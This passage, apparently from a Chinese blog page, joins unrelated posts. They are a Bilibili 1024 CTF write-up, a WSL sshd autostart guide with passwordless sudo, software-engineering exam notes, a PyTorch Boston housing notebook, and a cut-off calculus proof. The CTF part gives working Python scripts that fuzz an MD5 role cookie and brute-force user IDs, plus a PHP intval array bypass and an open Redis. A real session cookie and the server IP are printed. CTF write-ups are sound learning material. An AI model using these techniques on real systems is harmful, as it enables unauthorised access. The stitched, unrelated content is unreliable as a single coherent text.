Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: session=eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54; role=ee11cbb19052e40b07aac0ca060c23ee
Connection: close

百度可知:

1
2
In [2]: md5("user".encode("utf8")).hexdigest()
Out[2]: 'ee11cbb19052e40b07aac0ca060c23ee'

接下来尝试各种role的md5…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import requests
from hashlib import md5

def send_payload(payload):

cookies = {
'session': 'seeeeeeeeeeeeeeeession',
'role': md5(payload.encode("utf8")).hexdigest(),
}

headers = {
'Proxy-Connection': 'keep-alive',
'Accept': '*/*',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://45.113.201.36/superadmin.html',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
}

response = requests.get('http://45.113.201.36/api/ctf/4', headers=headers, cookies=cookies, verify=False)

return response

fuzz_list = [
"admin",
"superadmin",
"SuperAdmin",
"bilibili",
"root",
"管理员",
"超级管理员",
"chaojiguanliyuan",
"bilibiliadmin",
"bilibilisuperadmin",
"supervisor",
"administrator",
"superadministrator",
"chenrui",
]

fuzz_list.extend([s.capitalize() for s in fuzz_list])


for f in fuzz_list:
r = send_payload(f)
print(f"{f:>18}", r.text)

得到

1
2
Administrator {"code":200,"data":"flag","msg":""}

好耶!

0x05

审查代码环节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$(function () {


(function ($) {
$.getUrlParam = function(name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return unescape(r[2]); return null;
}
})(jQuery);

var uid = $.getUrlParam('uid');
if (uid == null) {
uid = 100336889;
}
$.ajax({
url: "api/ctf/5?uid=" + uid,
type: "get",
success:function (data) {
console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
$('#flag').html("欢迎超级管理员登陆~flag : " + data.data )
} else {
// 如果没值
$('#flag').html("这里没有你想要的答案~")
}
}
})
});

审查不出目标uid是多少, 盲打试试看

稍微修改上面的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def send_payload(payload):

cookies = {
'session': 'eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54',
}

headers = {
'Proxy-Connection': 'keep-alive',
'Accept': '*/*',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://45.113.201.36/superadmin.html',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
}

response = requests.get('http://45.113.201.36/api/ctf/5?uid={}'.format(payload), headers=headers, cookies=cookies, verify=False)

return response

for f in range(100336889, 100336889 + 10000):
r = send_payload(f)
rj = r.json()
if rj["data"]:
print(f"{f:>5}",rj)

print(finish)

等待结果即可

0x06

代码没什么可以审查的地方…

网页名字叫Black & White, 所有可以输入的地方只有email需要validation. 猜测是不是这里有xss.

构建payload

构建个鬼啦…
拿御剑扫, 能扫到test.phpend.php两个目录
进入test.php 得到一个js fucker编码的东西, 丢进去可以得到

1
2
3
var str1 = "\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9";
var str2 = "bilibili1024havefun";
console.log()
1
2
"\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9"
"程序员最多的地方"

好了, 去gayhub搜索bilibili1024havefun, 可以看到end.php的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<?php

//filename end.php

$bilibili = "bilibili1024havefun";

$str = intval($_GET['id']);
$reg = preg_match('/\d/is', $_GET['id']);

if(!is_numeric($_GET['id']) and $reg !== 1 and $str === 1){
$content = file_get_contents($_GET['url']);

//文件路径猜解
if (false){
echo "还差一点点啦~";
}else{
echo $flag;
}
}else{
echo "你想要的不在这儿~";
}
?>

传入id参数, 要求参数不含数字, 又能被intval解析为1, 查看php文档

1
2
echo intval(array());                 // 0
echo intval(array('foo', 'bar')); // 1

尝试构造payload: id[]=1&id[]=2

接下来猜解路径为/api/ctf/6/flag.txt (别问我怎么猜的, 盘外招也是CTF的一环)

得到flag文件bilibili_224a634752448def6c0ec064e49fe797_havefun.jpg

按照txt文件打开得到…{flag10:2ebd3b08-47ffc478-b49a5f9d-f6099d65}

第十题的flag.

炸裂

0x07

从第七题开始会得到这样的提示, 并且没有题目:

需要少年自己去探索啦~

哦.

据说后面四题的答案全都在第六题里, 懵了.

0x08

扫第六题的IP的端口能扫出一个redis, 连进去, 没密码, flag8, 搞定.

0x09

不知是啥

0x10

第六题中已经无意中摸到了

最好的Linux发行版是Windows10!

以下内容仅适用于Debian/Ubuntu.

安装并启动sshd

首先, 需要在发行版中确认存在openssh-server这个包.
和正常发行版不同的是, wsl中并没有使用systemd来启动系统.War, war never changes
因此, 想要启动ssh-server必须通过/etc/init.d/ssh来实现.

注意此处要修改/etc/ssh/sshd_config. 其中的Port建议修改为大于1024的端口, PasswordAuthentication建议修改为yes.

测试/etc/init.d/ssh start, 成功后进行下一步.

开机自启动sshd

wsl在执行第一个命令之前不会启动, 因此, 我们需要编写一个start_sshd.vbs脚本, 添加到计划任务里的开机启动事件.

脚本内容为:

1
2
3
Set wshell=wscript.createobject("wscript.shell")
wshell.run "C:\Windows\System32\wsl.exe sudo /etc/init.d/ssh start",0
Set wshell=Nothing

然而sudo命令需要输入密码才能启动, 为了bypass这一点, 需要修改sudo文件.

1
sudo visudo

添加

1
2
# for wsl start sshd
%sudo ALL=NOPASSWD: /etc/init.d/ssh start

并保存.

完成后请务必重启系统测试.

软件工程全生命周期及各个步骤的含义

需求工程, 需求描述有哪几种方法

UML建模, 类图, 时序图, 活动图, 部署图, 用例图, 描述清楚图的作用

给类图, 描述关系

设计模式: 解决了什么问题, 解决方案是什么, 结果如何

面向对象, 单一接口, 组合和聚合关系, 优于继承关系

尽可能少的和陌生实体建立联系

高内聚, 低耦合, 解释原则

面向扩展开放, 面向修改关闭

给类图, 描述设计模式

单例: 线程安全, 静态

组合, 观察者, 工厂, 抽象工厂, 代理(自治的软件实体, 能感知环境, 自主的执行, 具有社会性, 可以协作协商, 可以自组织, 可以迁移)

SaaS 简介, 边缘计算简述

使用nn对Boston housing数据集进行分类

数据文件: boston housing

1
2
3
4
5
6
7
8
#Let's get rid of some imports
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
#Define the model
import torch
import torch.nn as nn
import torch.nn.functional as F

实验流程

  • 获取数据
  • 分析数据
  • 建模
  • 模型评估
  • 模型储存
  • 模型对比

获取数据

  • 直接使用提供的boston_housing.txt文件
  • 不允许直接修改txt文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from io import StringIO
import pandas as pd

def read_text():
with open("boston_housing.txt") as f:
r_list = [i.replace("\n", "") for i in f.readlines()]

des_part = r_list[7:21]
data_part = r_list[22:]

des_part = [s.split()[0].strip() for s in des_part]
data_part = [
data_part[i] + data_part[i + 1] for i in range(0, len(data_part), 2)
]
df = pd.read_csv(StringIO("\n".join(data_part)),
sep="\s+",
header=None,
names=des_part)

# print(df.head())
return df

boston_df = read_text()
boston_df.head()

CRIM ZN INDUS CHAS NOX RM AGE DIS RAD TAX PTRATIO B LSTAT MEDV
0 0.00632 18.0 2.31 0 0.538 6.575 65.2 4.0900 1 296.0 15.3 396.90 4.98 24.0
1 0.02731 0.0 7.07 0 0.469 6.421 78.9 4.9671 2 242.0 17.8 396.90 9.14 21.6
2 0.02729 0.0 7.07 0 0.469 7.185 61.1 4.9671 2 242.0 17.8 392.83 4.03 34.7
3 0.03237 0.0 2.18 0 0.458 6.998 45.8 6.0622 3 222.0 18.7 394.63 2.94 33.4
4 0.06905 0.0 2.18 0 0.458 7.147 54.2 6.0622 3 222.0 18.7 396.90 5.33 36.2

属性意义:

CHASRAD 应该是离散量

- CRIM     per capita crime rate by town
- ZN       proportion of residential land zoned for lots over 25,000 sq.ft.
- INDUS    proportion of non-retail business acres per town
- CHAS     Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)
- NOX      nitric oxides concentration (parts per 10 million)
- RM       average number of rooms per dwelling
- AGE      proportion of owner-occupied units built prior to 1940
- DIS      weighted distances to five Boston employment centres
- RAD      index of accessibility to radial highways
- TAX      full-value property-tax rate per 10,000
- PTRATIO  pupil-teacher ratio by town
- B        1000(Bk - 0.63)^2 where Bk is the proportion of blacks by town
- LSTAT    % lower status of the population
- MEDV     Median value of owner-occupied homes in 1000's

接下来检查数据特征和质量

1
boston_df.describe()

CRIM ZN INDUS CHAS NOX RM AGE DIS RAD TAX PTRATIO B LSTAT MEDV
count 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000 506.000000
mean 3.613524 11.363636 11.136779 0.069170 0.554695 6.284634 68.574901 3.795043 9.549407 408.237154 18.455534 356.674032 12.653063 22.532806
std 8.601545 23.322453 6.860353 0.253994 0.115878 0.702617 28.148861 2.105710 8.707259 168.537116 2.164946 91.294864 7.141062 9.197104
min 0.006320 0.000000 0.460000 0.000000 0.385000 3.561000 2.900000 1.129600 1.000000 187.000000 12.600000 0.320000 1.730000 5.000000
25% 0.082045 0.000000 5.190000 0.000000 0.449000 5.885500 45.025000 2.100175 4.000000 279.000000 17.400000 375.377500 6.950000 17.025000
50% 0.256510 0.000000 9.690000 0.000000 0.538000 6.208500 77.500000 3.207450 5.000000 330.000000 19.050000 391.440000 11.360000 21.200000
75% 3.677082 12.500000 18.100000 0.000000 0.624000 6.623500 94.075000 5.188425 24.000000 666.000000 20.200000 396.225000 16.955000 25.000000
max 88.976200 100.000000 27.740000 1.000000 0.871000 8.780000 100.000000 12.126500 24.000000 711.000000 22.000000 396.900000 37.970000 50.000000
1
2
3
import numpy as np
#check for missing values
print(np.sum(np.isnan(boston_df)))
CRIM       0
ZN         0
INDUS      0
CHAS       0
NOX        0
RM         0
AGE        0
DIS        0
RAD        0
TAX        0
PTRATIO    0
B          0
LSTAT      0
MEDV       0
dtype: int64

分析数据

  • 首先,让我们关注因变量,大部分情况下存在正态分布,其中一些位于分布的顶端,我们稍后将进行探讨。
  • 然后关注数据集中的相关系数分布
1
2
3
4
#Let's us seaborn, because it is pretty. ;) 
#See more here. http://seaborn.pydata.org/tutorial/distributions.html
import seaborn as sns
sns.displot(boston_df['MEDV']);



1
2
corr = boston_df.corr()
corr.style.background_gradient(cmap='coolwarm')
CRIM ZN INDUS CHAS NOX RM AGE DIS RAD TAX PTRATIO B LSTAT MEDV
CRIM 1.000000 -0.200469 0.406583 -0.055892 0.420972 -0.219247 0.352734 -0.379670 0.625505 0.582764 0.289946 -0.385064 0.455621 -0.388305
ZN -0.200469 1.000000 -0.533828 -0.042697 -0.516604 0.311991 -0.569537 0.664408 -0.311948 -0.314563 -0.391679 0.175520 -0.412995 0.360445
INDUS 0.406583 -0.533828 1.000000 0.062938 0.763651 -0.391676 0.644779 -0.708027 0.595129 0.720760 0.383248 -0.356977 0.603800 -0.483725
CHAS -0.055892 -0.042697 0.062938 1.000000 0.091203 0.091251 0.086518 -0.099176 -0.007368 -0.035587 -0.121515 0.048788 -0.053929 0.175260
NOX 0.420972 -0.516604 0.763651 0.091203 1.000000 -0.302188 0.731470 -0.769230 0.611441 0.668023 0.188933 -0.380051 0.590879 -0.427321
RM -0.219247 0.311991 -0.391676 0.091251 -0.302188 1.000000 -0.240265 0.205246 -0.209847 -0.292048 -0.355501 0.128069 -0.613808 0.695360
AGE 0.352734 -0.569537 0.644779 0.086518 0.731470 -0.240265 1.000000 -0.747881 0.456022 0.506456 0.261515 -0.273534 0.602339 -0.376955
DIS -0.379670 0.664408 -0.708027 -0.099176 -0.769230 0.205246 -0.747881 1.000000 -0.494588 -0.534432 -0.232471 0.291512 -0.496996 0.249929
RAD 0.625505 -0.311948 0.595129 -0.007368 0.611441 -0.209847 0.456022 -0.494588 1.000000 0.910228 0.464741 -0.444413 0.488676 -0.381626
TAX 0.582764 -0.314563 0.720760 -0.035587 0.668023 -0.292048 0.506456 -0.534432 0.910228 1.000000 0.460853 -0.441808 0.543993 -0.468536
PTRATIO 0.289946 -0.391679 0.383248 -0.121515 0.188933 -0.355501 0.261515 -0.232471 0.464741 0.460853 1.000000 -0.177383 0.374044 -0.507787
B -0.385064 0.175520 -0.356977 0.048788 -0.380051 0.128069 -0.273534 0.291512 -0.444413 -0.441808 -0.177383 1.000000 -0.366087 0.333461
LSTAT 0.455621 -0.412995 0.603800 -0.053929 0.590879 -0.613808 0.602339 -0.496996 0.488676 0.543993 0.374044 -0.366087 1.000000 -0.737663
MEDV -0.388305 0.360445 -0.483725 0.175260 -0.427321 0.695360 -0.376955 0.249929 -0.381626 -0.468536 -0.507787 0.333461 -0.737663 1.000000

分割数据集

  • 一般将 y 设置为目标变量 and X(大写表示矩阵) 设置为自变量.
  • 使用 train_test_split 分割训练和测试数据集.
  • 将原来的数据集分为四份: X_train, X_test, y_train, y_test
  • 并且这个分割是随机抽取的, 随机种子由random_state设置来保证可以复现
1
2
3
4
5
6
7
def get_tag_columns(df, limit=10):
'''find cols contains continuous data'''
ret = []
for col in df.columns:
if df[col].nunique() < limit:
ret.append(col)
return ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from sklearn.preprocessing import StandardScaler, OneHotEncoder

def preprocess(df):
target_label = "MEDV"
y = df[target_label].values
df = df.drop(target_label, axis=1)

# one hot
tags = get_tag_columns(df)
tags_df = df[tags]

one_hot_df = pd.get_dummies(df[tags], columns=tags)
# print(one_hot_df.head())

# Standard
ss = StandardScaler()
X = np.concatenate([ss.fit_transform(one_hot_df), df.drop(tags, axis=1).values], axis=1)
return X.astype("float32"), y.astype("float32")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#This will throw and error at import if haven't upgraded. 
# from sklearn.cross_validation import train_test_split
from sklearn.model_selection import train_test_split
#y is the dependent variable.
# y = boston_df['MEDV'].values
# # As we know, iloc is used to slice the array by index number. Here this is the matrix of
# # independent variables.
# X = boston_df.iloc[:,0:-1].values

X, y = preprocess(boston_df)

# Split the data into a training set and a test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)

(354, 22) (152, 22) (354,) (152,)

建模

  • 接下来要设置一些训练用的超参数
  • 并且定义神经网络的结构
1
2
3
4
5
6
7
8
9
10
11
#Define training hyperprameters.
batch_size = 50
test_batch_size = 50
num_epochs = 500
learning_rate = 0.01
size_hidden= 100

#Calculate some other hyperparameters based on data.
batch_no = len(X_train) // batch_size #batches
cols=X_train.shape[1] #Number of columns in input matrix
n_output=1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#Create the model
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Assume that we are on a CUDA machine, then this should print a CUDA device:
print("Executing the model on :",device)
class Net(torch.nn.Module):
def __init__(self, n_feature, size_hidden, n_output):
super(Net, self).__init__()
self.hidden = torch.nn.Linear(cols, size_hidden) # hidden layer
self.predict = torch.nn.Linear(size_hidden, n_output) # output layer

def forward(self, x):
x = F.relu(self.hidden(x)) # activation function for hidden layer
x = self.predict(x) # linear output
return x
net = Net(cols, size_hidden, n_output)
Executing the model on : cuda:0
1
2
3
4
#Adam is a specific flavor of gradient decent which is typically better
optimizer = torch.optim.Adam(net.parameters(), lr=learning_rate)
#optimizer = torch.optim.SGD(net.parameters(), lr=0.2)
criterion = torch.nn.MSELoss(reduction='sum') # this is for regression mean squared loss
1
2
3
4
5
6
7
8
9
10
11
from torch.utils.data import TensorDataset, DataLoader
train_loader = DataLoader(
TensorDataset(torch.tensor(X_train, dtype=torch.float32), torch.tensor(y_train, dtype=torch.float32)),
batch_size=batch_size)

X_test_tensor = torch.tensor(X_test, dtype=torch.float32)
y_test_tensor = torch.tensor(y_test, dtype=torch.float32)

test_loader = DataLoader(
TensorDataset(X_test_tensor, y_test_tensor),
batch_size=test_batch_size)
1
2
3
4
5
train_loss = []
train_r2 = []
test_loss =[]
test_r2_x = []
test_r2 = []
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import pandas as pd
from sklearn.metrics import r2_score

running_loss = 0.0
for epoch in range(num_epochs):
#Shuffle just mixes up the dataset between epocs
# X_train, y_train = shuffle(X_train, y_train)
# Mini batch learning
net.train()
for inputs,labels in train_loader:
# start = i * batch_size
# end = start + batch_size
# inputs = Variable(torch.FloatTensor(X_train[start:end]))
# labels = Variable(torch.FloatTensor(y_train[start:end]))
# zero the parameter gradients
optimizer.zero_grad()

# forward + backward + optimize
outputs = net(inputs)
#print("outputs",outputs)
#print("outputs",outputs,outputs.shape,"labels",labels, labels.shape)
loss = criterion(outputs, torch.unsqueeze(labels,dim=1))
loss.backward()
optimizer.step()

# print statistics
running_loss += loss.item()
if epoch % 20 == 0 or epoch == num_epochs - 1:
with torch.no_grad():
net.eval()
result = net(X_test_tensor)
pred=result.data[:,0].numpy()
# print(len(pred),len(y_train))
r2_test = r2_score(pred,y_test_tensor)
test_r2_x.append(epoch)
test_r2.append(r2_test)
print('Epoch {:5}, loss {:10}, r2: {:3}'.format(epoch+1,running_loss, r2_test))
train_loss.append(running_loss)
running_loss = 0.0
Epoch     1, loss 183307.15435791016, r2: -2.598610349628883
Epoch    21, loss 12408.028907775879, r2: 0.012998142345433839
Epoch    41, loss 9915.79284286499, r2: 0.3333615213725519
Epoch    61, loss 8882.879081726074, r2: 0.348562519228811
Epoch    81, loss 6280.446783065796, r2: 0.49985757136694375
Epoch   101, loss 5083.443628311157, r2: 0.47137647771965885
Epoch   121, loss 4280.029432296753, r2: 0.5414219095454249
Epoch   141, loss 3558.088544845581, r2: 0.6027891438869899
Epoch   161, loss 3337.6654014587402, r2: 0.6037971240580867
Epoch   181, loss 3318.3874855041504, r2: 0.5410183626548175
Epoch   201, loss 2860.4403324127197, r2: 0.5880700361113333
Epoch   221, loss 4202.569885253906, r2: 0.24101134042952954
Epoch   241, loss 2625.922472000122, r2: 0.6117615302232601
Epoch   261, loss 3141.6027069091797, r2: 0.518363446529775
Epoch   281, loss 3209.169864654541, r2: 0.699972316605045
Epoch   301, loss 2891.8109397888184, r2: 0.4471336384834912
Epoch   321, loss 2454.4431190490723, r2: 0.680289615010776
Epoch   341, loss 2721.572551727295, r2: 0.6537569197620496
Epoch   361, loss 2374.3646926879883, r2: 0.6716516044749056
Epoch   381, loss 3353.4731216430664, r2: 0.650187875665645
Epoch   401, loss 3029.42342376709, r2: 0.6688595181218332
Epoch   421, loss 6365.018569946289, r2: 0.5285317058425256
Epoch   441, loss 3570.9040994644165, r2: 0.6478276332416046
Epoch   461, loss 5335.774890899658, r2: 0.575522473404229
Epoch   481, loss 4620.325346946716, r2: 0.6434875354238424
Epoch   500, loss 3078.047025680542, r2: 0.6554469434865164
1
2
3
4
5
6
7
8
import pandas as pd
from sklearn.metrics import r2_score

X = torch.FloatTensor(X_train)
result = net(X)
pred=result.data[:,0].numpy()
print(len(pred),len(y_train))
r2_score(pred,y_train)
  354 354
  0.9136254737114893
1
2
3
4
5
plt.figure()
train_loss_np = np.array(train_loss)
plt.plot(range(len(train_loss)), train_loss_np/train_loss_np.max(),"r", label="train")
plt.plot(test_r2_x, np.maximum(np.array(test_r2), 0), "g", label="test")
plt.legend()
<matplotlib.legend.Legend at 0x7fe2e488b640>



训练结果分析

  • 500个epochs之后
  • 测试集r2为0.72, 训练集r2为0.90
  • 残差依然在下降, 但是测试集的r2在150 epochs之后上升已不明显
1
2
# save model
torch.save(net.state_dict(), "dnn.pt")

模型对比

  • 首先引入线性回归模型类 from sklearn.linear_model import LinearRegression
  • 创建模型.
  • 利用训练集拟合数据.
  • 获得训练后的模型.
1
2
3
from sklearn.linear_model import LinearRegression
lm = LinearRegression()
lm.fit( X_train, y_train )
LinearRegression()
1
2
print('R2 for Train', lm.score( X_train, y_train ))
print('R2 for Test (cross validation)', lm.score(X_test, y_test))
R2 for Train 0.7732977014498186
R2 for Test (cross validation) 0.6789738823760003
1
2
3
4
5
6
7
8
# GBDT model
from sklearn.ensemble import GradientBoostingRegressor

reg = GradientBoostingRegressor(random_state=0)
reg.fit(X_train, y_train)

print('R2 for Train)', reg.score( X_train, y_train ))
print('R2 for Test (cross validation)', reg.score(X_test, y_test))
R2 for Train) 0.9841732181245905
R2 for Test (cross validation) 0.8405851379007085

对比结论

  • 线性回归模型略逊于双层神经网络, 但是更稳定可信, 计算更快速
  • GBDT模型在这个问题上全面优于神经网络

题目:

证明方程$x-\epsilon \sin{x} = 1 (0 \lt \epsilon \lt 1)$ 在R上必有唯一的实根
(限制不许求导)

分析:

拿到题的一瞬间, 感觉就是”这不是1 + 1”吗, 显而易见.

然后一看不许求导, 懵了.

首先设
$$f(x) = x-\epsilon \sin{x} - 1$$

那么有$f(0) = -1$ 且 $f(2) > 0$, 由初等函数的连续性和零值定理可知, f(x) = 0 在(0, 2)上必定有一根.

下一步证明单调性:

设: $x_1 > x_2$

$$
\begin{aligned}
f(x_1) - f(x_2) &= (x_1-\epsilon \sin{x_1} - 1) - (x_2-\epsilon \sin{x_2} - 1) \
&= (x_1 - x_2) - \epsilon(\sin{x_1} - \sin{x_2})\
&= (x_1 - x_2) - \epsilon * 2\cos{\frac{x_1+x_2}{2}}\sin{\frac{x_1 - x_2}{2}} \
&\geq (x_1 - x_2) - \epsilon * 2\sin{\frac{x_1 - x_2}{2}} \
&= 2(\frac{(x_1 - x_2)}{2} - \epsilon \sin{\frac{x_1 - x_2}{2}}) \
\mathrm{令} u = \frac{(x_1 - x_2)}{2} \
&= 2(u - \epsilon * \sin{u})
\end{aligned}
$$

已知$u > 0$, 当$\sin{u} \lt 0$ 时, 原式显然大于0.

当$\sin{u} \gt 0$ 时, 因为有

$|x| - |\sin{x}| > 0$ 而 $0 \lt \epsilon \lt 1$

则原式 > 0.